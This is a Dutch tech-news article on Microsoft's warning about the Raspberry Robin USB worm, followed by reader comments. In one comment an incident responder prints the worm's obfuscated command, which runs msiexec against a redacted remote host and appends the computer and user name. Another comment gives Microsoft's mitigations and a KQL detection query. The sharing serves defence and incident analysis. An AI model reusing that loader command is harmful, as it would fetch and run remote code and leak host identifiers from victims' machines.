Microsoft waarschuwt bedrijven voor Raspberry Robin-worm in netwerken

Microsoft heeft tientallen bedrijven gewaarschuwd voor een worm die vermoedelijk sinds vorig jaar rondgaat in Windows-bedrijfsnetwerken. De Raspberry Robin-worm verspreidt zich via USB-apparaten en is aangetroffen in de netwerken van honderden bedrijven.

De worm is vorig jaar ontdekt door onderzoekers van cybersecuritybedrijf Red Canary. Raspberry Robin verspreidt zich naar nieuwe Windows-systemen via geïnfecteerde USB-drives die een geïnfecteerd LNK-bestand bevatten. Wanneer de worm toegang heeft gekregen tot het netwerk, verspreidt die zich naar andere apparaten en systemen. Via de systemen communiceert die met zijn command-and-controlservers en voert payloads met malware uit via legitieme Windows-functies zoals msiexec of odbcconf.

"Raspberry Robin gebruikt msiexec.exe om externe netwerkcommunicatie naar een kwaadaardig domein op te zetten voor command-and-controldoeleinden", zegt Microsoft volgens Bleeping Computer. Het bedrijf bestempelt Raspberry Robin als een 'hoog beveiligingsrisico'. Microsoft heeft waargenomen dat de malware verbinding maakt met adressen op het Tor-netwerk, maar nog geen gebruik gemaakt van de toegang tot de netwerken van de slachtoffers. Toch kunnen de aanvallers elk moment toeslaan en meer malware verspreiden via de geïnfecteerde netwerken, waarschuwt het bedrijf. Het is niet bekend wie Raspberry Robin heeft verspreid en met welk doel dat is gebeurd.

Bron: Red Canary

Door Loïs Franx

Redacteur

04-07-2022 • 16:08

50 Linkedin

Submitter: Peter_Utrecht

Reacties (50)

Wijzig sortering
Geinig, Ik had een maand geleden te maken met een infectie hiervan.

We zagen in defender ATP msiexec verbinden naar een vreemd domein met computernaam en username in de URL, waardoor we m meteen van het netwerk afgooiden als zijnde mogelijk infected met een RAT.

Gebruiker had de USB stick van zn kind in de laptop gedaan, en dacht de folder op de USB te openen, maar dit was het .lnk bestand. Deze heeft hetzelfde naam en icoon als de folder, en de originele folder is hidden. Bij openen opent dan een nieuw explorer venster met de gewenste content, terwijl op de achtergrond een cmd-file wordt afgetrapt.

Domein was(nog) niet bekend als malicious bij virustotal of andere threat-intel feeds, maar het IP waarnaar het resolvde was een IOC van raspberry robin. Met de analyse van red canary konden we het puzzeltje compleet maken. Toen samples van de USB gelicht, en gesubmit naar microsoft, daar defender het .lnk toen nog niet oppakte.

Infectie konden we terug herleiden naar een smartboard op een basisschool, welke vermoedelijk deel uitmaakte van een botnet. School gebeld, en zij wilden geen verder onderzoek, maar hebben het betreffende board gewiped en opnieuw ingespoeld.

Gek artifact; het .lnk file slaat de computer Netbios naam op van waar de infectie van de USB heeft plaats gevonden.

[Reactie gewijzigd door Robindev op 4 juli 2022 21:57]

Ben ik er dan 'onderuit gekomen'?

Ik heb laatst een USB stick van een maat gekregen met wat custom auto's voor het spel Street Legal Racing Redline (verder niet boeiend).

Het mapje van die auto's was inderdaad hidden (maar alle hidden dingen laat mijn Windows vervaagd zien uiteraard) en er was een snelkoppeling naar de map op de root dir.

Snelkoppeling verwijderd en mapje unhide.... ik dacht een per ongeluk actie.
En dan mag hij zijn PC wel een keer deftig scannen denk ik.
Windows Defender volstaat hier lees ik hieronder?
Dat je er onderuit bent gekomen lijkt er wel op ja. de .lnk bevat dan zoiets als; /R cMD<YdpV.dAt waarbij de caps(hoofdletter/kleine letters) en naam willekeurig zijn. als dat bestandje wordt uitgevoerd door cmd.exe, zal die het commando;
^S^t^a^rT
^m^s^IE^x^EC -^Q /I "HTTp://xxx.xxx/xxxxxxxx/%COMpUTerNaMe%?%USeRnAME%" (x-jes zijn redacted) worden uitgevoerd, en daarna; ^S^Ta^Rt Ex^PlO^Rer "[folder]".

Als die vriend van je geïnfecteerd is, dan weet ik niet of defender dat op gaat pakken, daar de malware die gepoogd te worden gedownload vaak veranderd, zou ie onder de radar kunnen blijven. M.i. zou je de machine moeten beschouwen als geïnfecteerd. Afhankelijk van de infectie kunnen zaken zoals de PC opnieuw installeren helpen, maar afhankelijk van je kennisniveau, kan je overwegen hiervoor een expert in te schakelen.
Is er geen link naar een stukje detectie en verwijder software?
Ik lees net dat de MS Defender team ook op de hoogte is,
Hij is inderdaad zichtbaar in security.Microsoft.com waar je onder “hem” onder Threat Analytics terug kan vinden. De Security / sysadmin kan vanuit hier verder om te kijken of het voorkomt in het netwerk / de devices en detection regels configureren.

Executive summary
In early May 2022, a new worm named Raspberry Robin, was initially reported by Red Canary to have spread to Windows systems through infected USB devices. The USB device contains a disguised Windows shortcut (LNK) file. This worm relies on built-in Windows utilities such as msiexec.exe, fodhelper.exe, rundll32.exe, and odbconf.exe to install itself on the connected device, connect to a command-and-control (C2) server before downloading and launching additional DLL files.

Microsoft has observed this worm in hundreds of organizations spanning multiple industries. As of now, Microsoft security researchers have not attributed this worm to a threat actor group nor observed evidence of further lateral movement and advanced attacker activity upon initial installation of the worm. However, the usage of fodhelper.exe to spawn rundll32.exe, allows any downloaded malware to run with elevated administrative privileges without requiring a User Account Control prompt for consent or credentials, performing a UAC bypass. Due to the ability to achieve elevated permissions as well as the successful connection to an external domain, without proper protections in place, an attacker could easily escalate their attack to move laterally and access sensitive systems and data.

There are several detections that are available to help customers understand if they are impacted by this threat. Detection details for Microsoft 365 Defender are in the Detection details section of this report. Microsoft 365 Defender customers should also apply the security configurations and other prescribed mitigations and use the provided advanced hunting queries to check their network for attacks related to this tool.

Mitigations
Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

Turn on Microsoft Defender Firewall and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.
Practice the principle of least-privilege and maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Restricting local administrative privileges can help limit installation of remote access trojans (RATs) and other unwanted applications.
Enable Tamper Protection for Defender Antivirus
Enable Cloud-based protection for Defender Antivirus

Reduce attack surface

Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent several of the infection vectors of this threat. Attack surface reduction rules, which can be configured by any Microsoft Defender Antivirus user, offer significant hardening against the worm. In observed attacks, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:

Block executable files from running unless they meet a prevalence, age, or trusted list criterion
Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block untrusted and unsigned processes that run from USB

Tevens is er een Advanced Hunting query (KQL) beschikbaar waarmee je kan zoeken of dit voorkomt op je devices (Microsoft doet dit ook automatisch met Defender)

Advanced hunting
To locate possible exploitation activity, run the following queries.

Network connection launched from msiexec.exe

Upon execution of msiexec.exe, the malicious .LNK file will create a network connection over port 8080. Run query

DeviceProcessEvents | where FileName == "msiexec.exe" and ProcessCommandLine has_any ('http:','https:') | where ProcessCommandLine has_any ('/q', '-q') | where ProcessCommandLine has "8080"
Detection details
Antivirus

Microsoft Defender Antivirus incorporates next-generation antivirus capabilities, including machine learning and behavioral detection. This can result in overlapping detections, particularly of first-seen components and polymorphic variants.

Trojan:Win32/VintageDynamo.A - This is a generic detection looking for suspicious execution of .LNK files. There could be results from this that are not associated explicitly with the Raspberry Robin worm.

Endpoint detection and response (EDR)

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

Suspicious process launched using cmd.exe
Suspicious behavior by msiexec.exe
USB scanning

You can configure preferences for Windows Defender scans and updates to include scanning of removable drives. The Set-MpPreference cmdlet configures preferences for Windows Defender scans and updates. The following command allows you to scan removable drives:

-DisableRemovableDriveScanning<Boolean>

This command indicates whether to scan for malicious and unwanted software in removable drives, such as flash drives, during a full scan. If you specify a value of $False or do not specify a value, Windows Defender scans removable drives during any type of scan. If you specify a value of $True, Windows Defender does not scan removable drives during a full scan. Windows Defender can still scan removable drives during quick scans or custom scans.

[Reactie gewijzigd door HKLM_ op 4 juli 2022 16:45]

Een lnk was voldoende geweest ;)
Links gaan nog wel eens stuk. Dit is beter.
Een link als bronvermelding had het compleet gemaakt, in ieder geval zolang de link werkt. Daarna toch ook nog als basis van een zoekterm.

[Reactie gewijzigd door beerse op 6 juli 2022 12:22]

Wordt dit niet gewoon tegengehouden door UAC in bedrijfsnetwerken en gebrek aan local admin?

Msiexec aanroepen levert gebruikers gewoon een pop up op of ze even in willen loggen als admin, kunnen ze niet, problem solved?

Die download van die DLL files zou toch niet door de firewall heen moeten komen, ofwel geblocked op reputatie/categorie ofwel de virusscanner die ingrijpt?

Klinkt mij als vooral actief in het kleinbedrijf waar de bedrijfscomputer de standaard image van de OEM bevatten.

En sowieso, een goede admin staat bijna geen USB toe bij zijn gebruikers wat mij betreft.(ik schuil alvast even voor de flames ;-) )

Dus jammer dat er niet wat meer informatie in het artikel zit hierover.

Edit: uit de tekst van Microsoft:

Restricting local administrative privileges can help limit installation of remote access trojans (RATs) and other unwanted applications.

[Reactie gewijzigd door themadone op 4 juli 2022 17:46]

En sowieso, een goede admin staat bijna geen USB toe bij zijn gebruikers wat mij betreft.
Kleine correctie: “een goede admin zorgt er voor dat ‘zijn gebruikers’ hun werk op een veilige (en efficiënte) manier kunnen uitvoeren “

Als die gebruikers om welke reden dan ook USB-apparaten van welke aard dan ook nodig hebben, dan dient die admin ervoor te zorgdragen dat dit op een veilige manier kan. De admin staat in dienst van de gebruikers, niet andersom. Dat wil natuurlijk niet zeggen dat de admin geen eisen of beperkingen mag neerleggen, maar de gebruikers moeten wel functioneel hun werk kunnen uitvoeren.

(Er is niks generieks te zeggen over of iets technisch wel of niet ‘noodzakelijk’ is natuurlijk)
Heel veel gebruikers hebben geen USB stick nodig. Als er bestandsuitwisseling plaats moet vinden dan zijn er voor heel veel use cases andere en betere opties. De bestandsuitwisseling vindt dan plaats via een web portaal. Voordeel is dat je een idee hebt wie wat naar binnen en naar buiten brengt en dat je alle inkomende data door een wasstraat kunt halen. Voor wie echt met USB sticks aan de slag moet is er dan nog altijd de mogelijkheid van secure usb sticks. Die hebben dan ook weer het voordeel dat ze standaard een encryptie hebben en dat de data erop dus niet meteen op straat ligt als zo'n stick verloren gaat. En door de encryptie wordt die stick dan ook alleen voor het werk gebruikt. Voor zo even te gebruiken is het voor de meeste mensen te omslachtig.

edit: O en een goede admin bepaalt het beleid niet, die maakt mogelijk en onmogelijk wat het beleid van een bedrijf is. Wel kan het zijn dat hij hier wel een advies over geeft.

[Reactie gewijzigd door feuniks op 5 juli 2022 08:46]

Zoals ik al schreef. Er is niks generiek te zeggen over de noodzaak van bepaalde technische middelen in z'n algemeen. Voor veel functies zijn vaak meerdere manieren mogelijk, alleen is de één gebruikelijker dan dan de ander of eventueel praktischer in gebruik. Versimpel gezegd: "Een gebruiker heeft geen USB-drive nodig, maar een methode om bestanden tussen systemen te verplaatsen" of nog meer basaal "Een gebruiker heeft geen muis nodig, maar een methode om de cursor (op een makkelijke manier) over het beeld te verplaatsen")

Dat gezegd hebbende: USB-drives voor bestandsuitwisseling voelt inderdaad een beetje uit de tijd voor algemeen gebruik in een land waar de internetinfrastructuur op het niveau van Nederland of België is.
Maar allicht zijn er bedrijven die vanuit wet- of regelgeving (of misschien zelfs interne regelgeving) bepaalde systemen volledig geïsoleerd moeten houden en dat USB-drives de enige redelijke manier zijn om grotere hoeveelheden data tussen systemen uit te wisselen.
Ik kan me herinneren dat ik vroeger op AS/400-systemen diskettes moest beschrijven waar betaalopdrachten voor de bank op kwamen. Internet was al lang gemeengoed, maar bedrijven moesten hun bulkopdrachten toen nog per diskette opsturen. Sterker nog. Ik ging via internet over een VPN-tunnel naar een Terminal Server (een fysieke kast waat uit m'n hoofd zo'n 200 UNIX en AS/400 systemen aan zaten verbonden), die een seriële terminalsessie opstartte naar die AS/400. (dat waren nog is tijden ;) )

Ik weet dat de Maleisische Centrale Bank erg idioot strenge eisen stelt aan allerlei zaken, dus als je als bedrijf te maken hebt met Maleisische financiële instellingen kan dat heel snel heel veel gedoe zijn (geen idee of USB-sticks daar onder vallen overigens, maar even voor het idee :) ))

N.B. Wat ik zo begreep van het artikel en de werking van deze worm, had een versleutelde USB-drive hier niet bij uitgemaakt, aangezien het toch ontsleuteld moet worden voordat je er iets mee kan :)
Voor de worm an sich had de beveiligde USB stick in zo verre iets uitgemaakt, als dat hij die USB stick niet zo snel aan zijn kind zou hebben gegeven of op een andere manier privé had gebruikt, zodat de kans dat de stick besmet zou raken, kleiner is.
Ja, daar heb je zeker een punt :)
Msiexec zal op zichzelf niet zorgen dat de uac wordt getriggered. Deze komt alleen in beeld als msiexec opmerkt dat er iets in de systemspace veranderd moet worden, zoals wegschrijven in programfiles, windows directory, services geplaatst worden of veranderingen in hklm.
Als jij netjes in userspace blijft, zoals alleen hkcu, of wegschrijft in het gebruikersprofiel (zoals de niet enterprise versies van Chrome en Zoom doen), dan zul je geen uac zien.

Met de overgang naar modern management zijn gebruikers vaak ook gewoon admin. Om Windows toe te voegen aan een MDM oplossing heb je vaak admin rechten nodig (niet altijd, ligt aan welk ‘type’ autopilot wordt gebruikt, maar in veel gevallen gaat je het niet lukken vanuit user space).

Het niet gebruiken/niet toestaan van usb werkt niet, omdat je dan ook webcams,toetsenborden, etc blokkeert. Usb removable media zou wel een optie zijn, maar is te omzeilen (usb harddisk zijn dan vaak namelijk nog wel toegestaan omdat die zich net voordoen als een ander type). Maar idd, usb management software kan hier wel helpen, net als user/proces privilege management software of deny listing van onbekende applicaties en dll’s, al zit een deel daarvan weer het BYOD principe in de weg en ook de gebruikers ervaring neemt er weer van af (en daarmee de productiviteit van een medewerker).

Dus tja, het leven van een administrator en security specialist is niet makkelijk. Het is wikken en wegen. CYOD of gewoon corporated owned maakt het wel makkelijker beveiliging toe te passen.

[Reactie gewijzigd door SunnieNL op 4 juli 2022 18:32]

"Met de overgang naar modern management zijn gebruikers vaak ook gewoon admin. Om Windows toe te voegen aan een MDM oplossing heb je vaak admin rechten nodig (niet altijd, ligt aan welk ‘type’ autopilot wordt gebruikt, maar in veel gevallen gaat je het niet lukken vanuit user space)."

Dit is niet waar.
Wij hebben meerdere klanten met Modern Management (Modern Desktop/Workplace), kan gewoon zonder Admin rechten, die rechten zijn echt niet nodig.
Je kan alles configureren vanuit Microsoft Intune, ook alle applicaties deployen...
Dus ook via Windows Autopilot.

Het zijn naar mijn idee dezelfde scenario's als bij traditionele deployments met Configuration Manager... Bijvoorbeeld monteurs die continue software moeten kunnen installeren bij klanten, of de ontwikkelaars die meer rechten nodig hebben.
Maar de reguliere eindgebruiker (KA omgeving) kan gewoon zonder Local Admin.
Deployen van software gebeurd pas NA aanmelden bij Intune.
Een pc die je bij de mediamarkt koopt en je aan Intune wilt hangen, daar heb je toch echt wel admin rechten voor nodig. Dat gaat je niet lukken met alleen gebruikersrechten.

Dus ik heb het niet over acties NADAT je gekoppeld bent met MDM, maar om te koppelen met MDM heb je admin rechten nodig. Alleen als je machines staged in AAD kun je dat probleem omzeilen omdat de machine dan alleen nog maar met MDM/Autopilot gebruikt kan worden en je de keuze in de install wizard van Windows niet meer krijgt.

[Reactie gewijzigd door SunnieNL op 5 juli 2022 13:59]

Mijn klanten kopen de hardware niet bij de mediamarkt (MKB bedrijven doen dat niet lijkt mij, misschien kleine bedrijven?), maar rechtstreeks via Dell/HP of andere leverancier die direct de systemen al in AutoPilot voor je configureert.
Bij aankoop kan je dat al regelen, bv. order van 200 laptops, in 1x geimporteerd in AutoPilot, geen handmatige acties nodig, of je laat een CSV met de configuraties van die 200 laptops leveren die je importeert.

Dat is ook het idee van een "moderne werkplek", direct de doos opsturen naar je eindgebruiker, die pakt hem uit en schakelt voor de eerste keer in, autopilot en intune doet de rest.
En dan dus zonder Local Admin en handmatige acties van een IT afdeling (daar zit ook je besparing)

Wat jij schetst zien wij eerder in een BYOD scenario, een systeem bij de Media Markt, niet in een Corporate Device scenario...

Wat jij doet is ook heel erg omslachtig, hele "modern management" gedachten ga je hierin voorbij.
Ongemakkelijke naam voor die worm. Wakkert misschien angst voor Raspberry PI apparaten aan.
K zat met deze bril het artikel al te scannen naar een link met de Raspberry Pi. Wellicht komt het vooral voor op een windows variant voor de Pi?

[Reactie gewijzigd door 7ven op 4 juli 2022 16:12]

Niet elke Raspberry is een Pi!
Sommigen kun je gewoon eten! :)
Een Raspberry Robin is dan weer een paars/blauw roodborstje. Vogel het maar uit... :P
De Windows-variant voor de Pi is de ARM-versie. Een vrij algemene versie voor ARM-gebaseerde apparaten.
Ik denk dat dat wel meevalt, als je weet wat een Robin is. ;)
Ik denk een dubbele betekenis. "Round robin" is een netwerk-gerelateerde term die waarschijnlijk iets met de methode maken heeft
Toch denk ik dat de kans hoger is om wormen aan te treffen in het fruit dan in een plakje silicon ;)
Volgens mij is het een mus-achtige vogel die insecten op abrikozenstruiken vangt. :+
Mee eens, vroeg me ook al af hoe usb sticks via een lnk bestand een Raspberry Pi zouden infecteren... Hoeft er dus niks mee te maken en betreft dus puur een Windows virus.
Wie verzint zo’n naam? En als het de makers zelf zijn, laten we ze dan voortaan niet eren door hun naamgeving aan te houden en het te verbasteren naar iets lames.
Ik dacht bij het lezen van de titel ook eerst dat er een of andere worm de ronde deed die Raspberry Pi's targette.

[Reactie gewijzigd door Mavamaarten op 5 juli 2022 13:11]

Maar zo'n .lnk opent zich toch niet vanzelf? Dus mensen proppen en vreemde usb-stick in hun computer en gaan vervolgens van alles en nog wat aanklikken?
Zo'n bestand.lnk valt voor heel veel helemaal niet op. Het is de extentie van een shortcut. Daarmee gooit de verkenner die extentie altijd weg, ook als je alle extenties altijd wilt zien.

Een shortcut is het element waar het meest/snelst/makkelijkst op wordt geklikt. Als het op 1 of andere manier toch opstartbaar is dan gaat het zomaar gebeuren.
Misschien dat Microsoft iets veranderd heeft, maar als ik het me goed herinner heeft een shortcut een pijltje in de linker onderhoek.
Klopt helemaal. Maar dat pijltje heeft helemaal geen alarmerende waarde. Het ontbreken van een extentie ook niet. Ik hoor het de gebruikers al zeggen: "Het is toch geen executable"....
Ik hoor het de gebruikers al zeggen: "Het is toch geen executable"....
Tjah, en ergens hebben ze wel gelijk. Waar mag je anders wel nog op klikken? Als je nergens meer op mag klikken, dan kan je de filebrowser ook ineens uitzetten. Verder zijn er ook al exploits geweest die de thumbnail generator gebruikte om malware te installeren. Daar moet je zelfs niet meer op iets klikken, gewoon de file zien staan op je scherm is genoeg.

Geen USB drives gebruiken is een manier om dat als vector tegen te gaan, maar vermoedelijk kan je dit ook gewoon via network drives doen.

Ik vind het moeilijk om in dit geval met de vinger naar gebruikers te wijzen.
Er zijn best veel bedrijven waarbij het gebruik van usb-sticks strikt aan banden is gelegd. Zoals 'niet' en 'alleen een bepaald merk/type' en dergelijke. Dat kan dan ook allemaal worden afgedwongen en zo.

Aan de andere kant worden ook veel vdi-systemen gebruikt. Varianten op remote-desktop vanaf een eigen (byod) apparaat en/of via vpn naar de zaak. Daar kan je dan geen usb-stick in steken maar daar zit standaard dan vaak weer wel een netwerk drive aan gekoppeld naar het thuis systeem...

Het voordeel van aan usb-stick is dat je die achteloos op straat/stoep/parkeerplaats kan achterlaten en je kan ze uitdelen op beursen en dergelijke.
Yup mensen zijn nieuwsgierig, zelfs al ligt er een USB killer op de grond de kans is aanwezig dat iemand het opraapt en kijkt wat er op staat.
Oh iemand is z'n USB vergeten. Even kijken van wie die is, om hem terug te geven.
Kan inderdaad snel gaan zoiets. Zeker als de .lnk een bestandsnaam heeft die daarbij helpt.
Zou een shady wifi/Bluetooth dongle van bijv Ali ook zoiets kunnen bevatten?
BadUSB is een ding...
Ik gok dat de lnk wordt gestart m.b.v. de auto-run feature. De auto-run feature voor removable storage is weer uit te schakelen m.b.v. GPO's. Als mijn vermoeden klopt zou ik verwachten dat dit als mitigerende maatregel in het artikel wordt opgenomen.
Wanneer autoplay ingeschakeld is op je systeem kan een .lnk bestand van een USB drive geopend worden.
Stukje uitleg door Trend Micro (over een andere worm, maar zelfde principe):
https://success.trendmicr..._US&sfdcIFrameOrigin=null

[Reactie gewijzigd door Roy23 op 4 juli 2022 16:49]

Hey @hcQd
Als je het bericht van @Robindev leest dan is het iets beter verstopt dan jij aan neemt.
Gebruiker had de USB stick van zn kind in de laptop gedaan, en dacht de folder op de USB te openen, maar dit was het .lnk bestand. Deze heeft hetzelfde naam en icoon als de folder, en de originele folder is hidden. Bij openen opent dan een nieuw explorer venster met de gewenste content, terwijl op de achtergrond een cmd-file wordt afgetrapt.
Niet heel gek dus dat mensen de .lnk aanklikken.
Staat nog niet veel in over hoe de eerste infectie plaatsvindt. Lijkt me op handmatig linkje klikken en via via uiteindelijk een vreemde executable starten. Komt neer op complexe versie van willekeurige executable openen. Ik zie ook nergens dat er sprake is van privilege escalation.
Wat zegt Microsoft tegen die tientallen bedrijven om te doen dan? Is het gewoon een kwestie van de virusscanners updaten? Of zijn er detectietools?
Die zijn er wel .. SIEM-oplossingen, Wazuh, suricata regels noem maar op. Maar die moet je wel geïnstalleerd hebben en monitoren.
Ooit bij een bedrijf geweest waar alle USB poorten om deze reden met secondelijm waren dicht gezet.
Want zowel Linux als Windows waren dan veilig. Denk wel 15 jaar geleden.
Lijkt mij erg omslachtig en wat doe je dan als een muis of toetsenbord stuk is? De hele computer vervangen?

Dan gebruik je beter USBGuard. Geen idee of er ook zoiets bestaat voor Windows.
Moet toch een heel klein wormpje zijn die door al die kabels heen kan kruipen :*)

Maar tja, even serieus, deels wel goed dan dat Microsoft dit ontdekt heeft en bedrijven meteen waarschuwt ervoor. Alleen denk ik wel van had dit niet al in een vroeger stadium ontdekt kunnen worden want wie weet wat voor schade het nu weer veroorzaakt.

Verder vind ik dit alweer een bewijs ervoor dat alles maar automatiseren nog steeds in mijn ogen in de kinderschoenen staat. Hoe vaak hoor je dit niet dat er weer dat servers plat gaan hetzij door menselijke fouten maar ook door hacks.

Kies score Let op: Beoordeel reacties objectief. De kwaliteit van de argumentatie is leidend voor de beoordeling van een reactie, niet of een mening overeenkomt met die van jou.

Een uitgebreider overzicht van de werking van het moderatiesysteem vind je in de Moderatie FAQ

Rapporteer misbruik van moderaties in Frontpagemoderatie.



Op dit item kan niet meer gereageerd worden.


Nintendo Switch (OLED model) Apple iPhone SE (2022) LG G1 Google Pixel 6 Call of Duty: Vanguard Samsung Galaxy S22 Garmin fēnix 7 Nintendo Switch Lite

Tweakers vormt samen met Hardware Info, AutoTrack, Gaspedaal.nl, Nationale Vacaturebank, Intermediair en Independer DPG Online Services B.V.
Alle rechten voorbehouden © 1998 - 2022 Hosting door True

Tweakers maakt gebruik van cookies

Tweakers plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Tweakers relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie. Meer details

janee

    Relevantere advertenties

    Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Tweakers contextuele advertenties te tonen op basis van pagina's die je hebt bezocht. Meer details

    Tweakers genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Tweakers gevolgd worden. Indien je bent ingelogd, wordt deze identifier gekoppeld aan je account. Indien je niet bent ingelogd, wordt deze identifier gekoppeld aan je sessie die maximaal 4 maanden actief blijft. Je kunt deze toestemming te allen tijde intrekken.

    Ingesloten content van derden

    Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden. Meer details

    janee